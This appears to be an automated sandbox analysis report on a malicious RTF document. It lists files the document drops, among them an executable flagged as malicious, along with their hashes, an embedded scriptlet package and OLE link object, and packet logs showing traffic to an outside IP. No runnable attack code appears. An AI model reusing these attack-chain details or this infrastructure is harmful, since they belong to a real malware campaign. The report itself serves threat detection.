                                                          Size (bytes):162
                                                          Entropy (8bit):2.5038355507075254
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                          Malicious:false
                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):2
                                                          Entropy (8bit):1.0
                                                          Encrypted:false
                                                          SSDEEP:3:Qn:Qn
                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                          Malicious:false
                                                          Preview: ..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms2E (copy)
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msio (copy)
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FQ6733LFPKS74NKOVPFM.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O2GRPLQKV4A3U7C26MID.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TM4WFGYHJ2HGTOWTIN9Q.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.582206362297639
                                                          Encrypted:false
                                                          SSDEEP:96:chQCQMqlqvsqvJCwoiiz8hQCQMqlqvsEHyqvJCworwizKAYuHXiKXX2lUV8iA2:cWUoiiz8WAHnorwizKoiKXXKiA2
                                                          MD5:484FCA57FA5B39E59B75DE31E510D704
                                                          SHA1:A9A4B2579158D1C71122D7C1418C78B497B41570
                                                          SHA-256:80DDFCC0C707A6DF30F4F380C75C16A941158AA0BAA660CAEB068C3234F718FD
                                                          SHA-512:6286D09A5E01E54B7FA57724E4CCC73B36C3E179986A61055CC0A4B77CEEC144BC44545EEC8B7AF68F089721780242F0C7CEB0A865A3FE9E397DE034D96B6C45
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\okcff.exe
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):194560
                                                          Entropy (8bit):4.668942832070624
                                                          Encrypted:false
                                                          SSDEEP:1536:QLwio+gEPHeB9PYR0uQ7nXhMM70iOVcse5m6h:rt+gIHeB9PYRnQL6S5
                                                          MD5:E9416A322E9A796D45588BC4FB04CD45
                                                          SHA1:8D261D205C8D34A4A24B713DD6B9585647B8BDEB
                                                          SHA-256:F2DA177AFF59093ABE1D3BC7C1A769BE2701784036C398900A43725D83C9E9A9
                                                          SHA-512:9A1FF2B39DFD93D3B6EAED4685876E8BF877BD1695FDC7095B74ABEADAFBAEE785815FEB75585D31299B3D0A18B5E88890DA942D65F407171C28CAF66655C5AE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y................0..T..........Ns... ........@.. .......................@............@..................................s..K.......X.................... ....................................................... ............... ..H............text...TS... ...T.................. ..`.rsrc...X............V..............@..@.reloc....... ......................@..B................0s......H........B.../..........Hr...............................................0...........r...p(....(.....(......(.....*..0..Q....... ......$.8......$.E........................S...............c...........^...........7...>...2...................(...................[...........m...8.....8M... ....~_...:....& ....8......(.E........q.......^...8............io....8......./(....:8... ....8......,.....(....(.....* ....~h...9....& ....8...../(....t......8....(.....*(...... ....~....9]...&
                                                          C:\Users\user\Desktop\~$478644.doc
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.5038355507075254
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                          Malicious:true
                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type: Rich Text Format data, unknown version
Entropy (8bit): 3.602985307524326
TrID:
• Rich Text Format (5005/1) 55.56%
• Rich Text Format (4004/1) 44.44%
File name: 478644.doc
File size: 392070
MD5: c0f8f2fc481e9be7141d84b401edf1f7
SHA1: ab1dbe841b083ea886c9023307c0527f7bfbfff3
SHA256: 4b0d21f58347c62f76445c6aa17a21dd00970f235734a1d1db4a40ee5a8b7c45
SHA512: 215ace87d1af8847a40c2b8763230e1004c0c2b2f1cc842ddcb0fe73d7f2238c0fa024be82380c5135d55b5585d6d86e6619f59f36e5f43696d9bb1591784d77
SSDEEP: 1536:inHYJDDDDDDDDtdLZvR0y0FC7Qqofroy41hzO9lca57hKfhdzFz76mAg5eeVhMDU:iYDDDDDDDDjoUdzFtr5RDAw5wfo
File Content Preview: {\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

File Icon

Icon Hash: e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 000007CDh | 2 | embedded | package | 97076 | abdtfhgXgeghDp.ScT | C:\nsdsTggH\abdtfhgXGeghDp.ScT | C:\CbkepaD\abdtfhghgeghDp.ScT | no
1 | 00031D7Ah | 2 | embedded | OLE2LInk | 2560 |  |  |  | no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2022 10:23:17.968811989 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:17.995575905 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:17.995758057 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:17.996404886 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.023190022 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.024344921 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.024382114 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.024405003 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.024426937 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.024430990 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.024451971 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.024465084 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.024475098 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.024492979 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.024496078 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.024511099 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.024519920 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.024549961 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.024666071 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.024691105 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.024725914 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.024754047 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.032021999 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051234007 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051270008 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051295042 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051320076 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051333904 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051345110 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051366091 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051371098 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051373005 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051374912 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051398993 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051424026 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051436901 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051451921 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051457882 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051465988 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051505089 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051527977 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051553965 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051578045 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051578999 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051592112 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051635027 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051668882 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051695108 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051718950 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051729918 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051752090 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051757097 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051820993 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051853895 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051867962 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051877975 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051894903 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051903963 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.051913977 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.051945925 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.052258968 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.052330971 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.052876949 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078186035 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078212976 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078226089 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078238964 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078257084 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078288078 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078294039 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078342915 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078356981 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078391075 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078397989 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078434944 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078453064 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078470945 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078475952 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078489065 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078495026 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078510046 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078525066 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078588963 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078607082 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078624964 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078632116 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078641891 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078648090 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078661919 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078679085 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078778028 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078795910 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078814030 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078819036 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078833103 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078834057 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078851938 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078869104 CET | 49167 | 80 | 192.168.2.22 | 37.0.9.166
Jan 14, 2022 10:23:18.078922987 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22
Jan 14, 2022 10:23:18.078941107 CET | 80 | 49167 | 37.0.9.166 | 192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2022 10:23:17.920835972 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2022 10:23:17.952476025 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Jan 14, 2022 10:23:22.426112890 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2022 10:23:22.446824074 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Jan 14, 2022 10:23:23.372718096 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2022 10:23:23.440036058 CET | 53 | 57805 | 8.8.8.8 | 192.168.2.22
Jan 14, 2022 10:23:26.991931915 CET | 59030 | 53 | 192.168.2.22 | 8.8.8.8
Jan 14, 2022 10:23:27.011117935 CET | 53 | 59030 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
